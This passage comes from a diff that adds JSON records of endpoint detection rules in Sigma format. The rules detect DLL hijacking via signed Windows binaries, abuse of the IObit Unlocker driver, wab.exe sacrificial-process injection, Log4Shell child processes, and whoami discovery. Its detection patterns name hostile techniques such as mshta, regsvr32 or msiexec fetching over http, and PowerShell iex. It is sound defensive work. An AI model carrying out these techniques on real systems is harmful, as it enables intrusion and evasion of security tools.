'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "098502c3-27e1-4c6f-a53e-8fa8f3dd549f",
+ "rule_name": "DLL Hijacking via pcalua.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via pcalua.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "09c303fe-d535-4d15-9f45-17f91b3e39fc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.627557Z",
+ "creation_date": "2026-03-23T11:45:34.627559Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.627563Z",
+ "rule_level": "critical",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.reliaquest.com/blog/double-extortion-attack-analysis/",
+ "https://www.iobit.com/fr/iobit-unlocker.php",
+ "https://attack.mitre.org/techniques/T1562/001/"
+ ],
+ "name": "t1562_001_execution_of_renamed_iobitunlocker_driver.yml",
+ "content": "title: Renamed IObit Unlocker Driver Loaded\nid: 09c303fe-d535-4d15-9f45-17f91b3e39fc\ndescription: |\n Detects the loading of a renamed IObit Unlocker driver. IObit Unlocker is a utility used to remove files locked by the system.\n This driver driver has been abused by adversaries to disable security tools and evade detection.\n It is recommended to analyze the host for other suspicious activities and to isolate it if needed.\nreferences:\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://www.iobit.com/fr/iobit-unlocker.php\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/09/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Tool.IoBitUnlocker\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.VulnerableDriver\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: driver_load\n product: windows\ndetection:\n selection:\n OriginalFileName: 'IObitUnlocker.sys'\n\n # This is handled by the rule 79f2b027-0261-441e-a1d1-d569515a7c9b\n filter_image:\n ImageLoaded|endswith: '\\IObitUnlocker.sys'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "09c303fe-d535-4d15-9f45-17f91b3e39fc",
+ "rule_name": "Renamed IObit Unlocker Driver Loaded",
+ "rule_description": "Detects the loading of a renamed IObit Unlocker driver. IObit Unlocker is a utility used to remove files locked by the system.\nThis driver driver has been abused by adversaries to disable security tools and evade detection.\nIt is recommended to analyze the host for other suspicious activities and to isolate it if needed.\n",
+ "rule_creation_date": "2023-09-19",
+ "rule_modified_date": "2026-02-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1562.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "09e88047-86aa-4e82-a0bb-4d8613732d6a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.616726Z",
+ "creation_date": "2026-03-23T11:45:34.616729Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.616737Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/",
+ "https://attack.mitre.org/techniques/T1055/"
+ ],
+ "name": "t1055_sacrificial_process_wab.yml",
+ "content": "title: Wab.exe Sacrificial Process Spawned\nid: 09e88047-86aa-4e82-a0bb-4d8613732d6a\ndescription: |\n Detects the suspicious execution of the legitimate wab.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by GuLoader, an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\n It is recommended to investigate the parent process performing this action and the destination IP address of wab.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/22\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Program Files\\Windows Mail\\wab.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "09e88047-86aa-4e82-a0bb-4d8613732d6a",
+ "rule_name": "Wab.exe Sacrificial Process Spawned",
+ "rule_description": "Detects the suspicious execution of the legitimate wab.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by GuLoader, an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\nIt is recommended to investigate the parent process performing this action and the destination IP address of wab.exe process to determine the legitimacy of this behavior.\n",
+ "rule_creation_date": "2024-03-22",
+ "rule_modified_date": "2025-02-03",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1055"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "09f74bd7-74d5-4ebb-bdda-430f8cf9a81f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.073376Z",
+ "creation_date": "2026-03-23T11:45:34.073377Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.073382Z",
+ "rule_level": "high",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/",
+ "https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/",
+ "https://attack.mitre.org/versions/v10/techniques/T1190/"
+ ],
+ "name": "t1190_log4j_vulnerability_exploitation.yml",
+ "content": "title: Suspicious Process Spawned by Java Application\nid: 09f74bd7-74d5-4ebb-bdda-430f8cf9a81f\ndescription: |\n Detects a potential exploitation of the Apache Java Logging Library Log4j Vulnerability aka Log4Shell (CVE-2021-44228).\n This critical vulnerability is a remote code execution (RCE) in the Apache Java logging library Log4j, actively exploited, that allows an attacker to gain full control of the affected servers.\n It is recommended to analyze the processes executed by the Java process to look for malicious actions and to determine whether the Java application is running a vulnerable version of Log4j.\nreferences:\n - https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/\n - https://www.microsoft.com/en-us/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/\n - https://attack.mitre.org/versions/v10/techniques/T1190/\ndate: 2021/12/20\nmodified: 2025/05/27\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.Java\n - classification.Windows.Exploit.Log4Shell\n - classification.Windows.Exploit.CVE-2021-44228\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ParentImage|endswith:\n - '\\java.exe'\n - '\\javaw.exe'\n - '\\jp2launcher.exe'\n - ParentImage|endswith: '\\cmd.exe'\n GrandparentImage|endswith:\n - '\\java.exe'\n - '\\javaw.exe'\n - '\\jp2launcher.exe'\n\n selection_powershell:\n Image|endswith: '\\powershell.exe'\n CommandLine|contains:\n - 'iex'\n - 'invoke-expression'\n - 'Start-Process'\n - 'New-Object -ComObject'\n - '*^*^*^*'\n\n selection_msiexec:\n Image|endswith: '\\msiexec.exe'\n CommandLine|contains: 'http'\n\n selection_mshta:\n Image|endswith: '\\mshta.exe'\n CommandLine|contains: 'http'\n\n selection_regsvr32:\n Image|endswith: '\\regsvr32.exe'\n CommandLine|contains: 'http'\n\n selection_rundll32:\n Image|endswith: '\\rundll32.exe'\n CommandLine|contains|all:\n - 'RunHTMLApplication'\n - 'mshtml'\n\n selection_hh:\n Image|endswith: '\\hh.exe'\n CommandLine|contains: 'http'\n\n selection_schtasks:\n Image|endswith: '\\schtasks.exe'\n CommandLine|contains: '/create'\n\n exclusion_commandline:\n CommandLine|contains:\n - 'powershell.exe -Command & {Start-Process -FilePath `\"?:\\KineQuantum\\steamvrredist\\bin\\'\n - 'powershell.exe -Command Start-Process ??:\\Program Files\\'\n - 'powershell.exe -Command Start-Process ??:\\Program Files (x86)\\'\n - '/tr ?:\\Apple\\Local\\Library\\WebObjects\\Applications\\'\n - '/tr ??:\\Program Files\\'\n - '/tr ??:\\Program Files (x86)\\'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nfalsepositives:\n - Some Java applications may spawn a legitimate process.\nlevel: high\nconfidence: moderate\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "09f74bd7-74d5-4ebb-bdda-430f8cf9a81f",
+ "rule_name": "Suspicious Process Spawned by Java Application",
+ "rule_description": "Detects a potential exploitation of the Apache Java Logging Library Log4j Vulnerability aka Log4Shell (CVE-2021-44228).\nThis critical vulnerability is a remote code execution (RCE) in the Apache Java logging library Log4j, actively exploited, that allows an attacker to gain full control of the affected servers.\nIt is recommended to analyze the processes executed by the Java process to look for malicious actions and to determine whether the Java application is running a vulnerable version of Log4j.\n",
+ "rule_creation_date": "2021-12-20",
+ "rule_modified_date": "2025-05-27",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.initial_access"
+ ],
+ "rule_technique_tags": [
+ "attack.t1190"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0a3934f6-2b4c-4fb0-81ea-2601e7665b3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "low",
+ "rule_effective_confidence": "weak",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.622840Z",
+ "creation_date": "2026-03-23T11:45:34.622842Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.622846Z",
+ "rule_level": "low",
+ "rule_confidence": "weak",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1033/"
+ ],
+ "name": "t1033_whoami_windows.yml",
+ "content": "title: Current Username Discovered via Whoami (Windows)\nid: 0a3934f6-2b4c-4fb0-81ea-2601e7665b3a\ndescription: |\n Detects the execution of whoami.exe.\n This command is often used by attackers during the discovery phase to discover their user ID, permissions and groups.\n It is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\ndate: 2021/03/15\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n # whoami /groups\n - attack.t1069\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\whoami.exe'\n # Renamed binaries\n - OriginalFileName: 'whoami.exe'\n\n selection_commandline:\n CommandLine:\n - 'whoami'\n - 'whoami ?all'\n - 'whoami ?priv'\n - 'whoami ?groups'\n - 'whoami.exe'\n - 'whoami.exe ?all'\n - 'whoami.exe ?priv'\n - 'whoami.exe ?groups'\n ParentImage|contains: '?'\n\n # This is handled by the rule 77575317-f87a-49a1-b295-f2a7a23f75d4\n filter_system:\n IntegrityLevel: 'System'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_grandparentimage:\n GrandparentImage|endswith:\n # IBM i Access Client Solutions\n - '\\Start_Programs\\Windows_i386-32\\acslaunch_win-32.exe'\n - '\\Start_Programs\\Windows_x86-64\\acslaunch_win-64.exe'\n - '\\ArcGIS\\Portal\\framework\\service\\bin\\ArcGISPortal.exe'\n - '\\ArcGIS\\Portal\\framework\\runtime\\jre\\bin\\javaw.exe'\n - '\\ArcGIS_Portal\\Portal\\framework\\service\\bin\\ArcGISPortal.exe'\n - '\\ArcGIS_Portal\\Portal\\framework\\runtime\\jre\\bin\\javaw.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ccmcache:\n CurrentDirectory|startswith: '?:\\Windows\\ccmcache\\'\n\n exclusion_msys2:\n Image: '?:\\msys64\\usr\\bin\\whoami.exe'\n ParentImage:\n - '?:\\msys64\\usr\\bin\\bash.exe'\n - '?:\\msys64\\usr\\bin\\sh.exe'\n\n exclusion_ms_monitoring_agent:\n # grandparent: C:\\Windows\\system32\\cscript.exe /nologo ApplicationPartitionDiscovery.vbs 0 {B87E55DB-EA55-993D-FA42-5A4B215D0593} {59E3FB68-8F43-D96C-1EF9-EE090EDDD8E6} false xxx_domain_name_xxx yyyyy 11001 21001\n GrandparentCommandLine|startswith: '?:\\Windows\\system32\\cscript.exe /nologo ApplicationPartitionDiscovery.vbs '\n CurrentDirectory|startswith: '?:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State'\n\n exclusion_palo_alto:\n # C:\\windows\\system32\\cmd.exe /S /C chcp 437>nul 2>&1 & C:\\windows\\System32\\whoami.exe /groups\n # but for whatever reason, we don't have the grandparentinfo (PanGpHip.exe)\n CommandLine: '?:\\windows\\System32\\whoami.exe /groups' # 1 space before /groups\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /S /C chcp 437>nul 2>&1 & ?:\\windows\\System32\\whoami.exe /groups' # 2 spaces before /groups\n\n exclusion_podman:\n GrandparentImage|endswith: '\\Podman Desktop.exe'\n ParentCommandLine: 'powershell.exe $null -ne (whoami /groups /fo csv | ConvertFrom-Csv | Where-Object {$_.SID -eq \"S-1-5-32-544\"})'\n\n exclusion_cygwin:\n Image|endswith: '\\cygwin64\\bin\\whoami.exe'\n ParentImage|endswith: '\\cygwin64\\bin\\bash.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '\\postgresql-*.*-*-windows-x64.exe|'\n - '|?:\\VTOM\\ABM\\BIN\\bdaemon.exe|'\n - '|?:\\Program Files (x86)\\F5 VPN\\f5fpclientW.exe|'\n\n exclusion_schedule:\n GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0a3934f6-2b4c-4fb0-81ea-2601e7665b3a",
+ "rule_name": "Current Username Discovered via Whoami (Windows)",
+ "rule_description": "Detects the execution of whoami.exe.\nThis command is often used by attackers during the discovery phase to discover their user ID, permissions and groups.\nIt is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\n",
+ "rule_creation_date": "2021-03-15",
+ "rule_modified_date": "2026-03-16",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.discovery"
+ ],
+ "rule_technique_tags": [
+ "attack.t1033",
+ "attack.t1069"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0a4830e7-82c9-4ac1-b846-a68dc4caa7ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.098031Z",
+ "creation_date": "2026-03-23T11:45:34.098033Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.098037Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://securityintelligence.com/posts/windows-features-dll-sideloading/",
+ "https://github.com/xforcered/WFH",
+ "https://twitter.com/an0n_r0/status/1544472352657915904",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_iexpress.yml",
+ "content": "title: DLL Hijacking via IEXPRESS.exe\nid: 0a4830e7-82c9-4ac1-b846-a68dc4caa7ab\ndescription: |\n Detects potential Windows DLL Hijacking via IEXPRESS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'IEXPRESS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0a4830e7-82c9-4ac1-b846-a68dc4caa7ab",
+ "rule_name": "DLL Hijacking via IEXPRESS.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via IEXPRESS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2022-09-15",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0a4bf049-476a-4f76-b1ff-c92e630ba3ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.588153Z",
+ "creation_date": "2026-03-23T11:45:34.588157Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.588165Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://github.com/xforcered/WFH",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_label.yml",
+ "content": "title: DLL Hijacking via label.exe\nid: 0a4bf049-476a-4f76-b1ff-c92e630ba3ea\ndescription: |\n Detects potential Windows DLL Hijacking via label.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'label.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\ifsutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0a4bf049-476a-4f76-b1ff-c92e630ba3ea",
+ "rule_name": "DLL Hijacking via label.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via label.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0a708087-9ef8-4db8-b5a9-84d30391d776",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
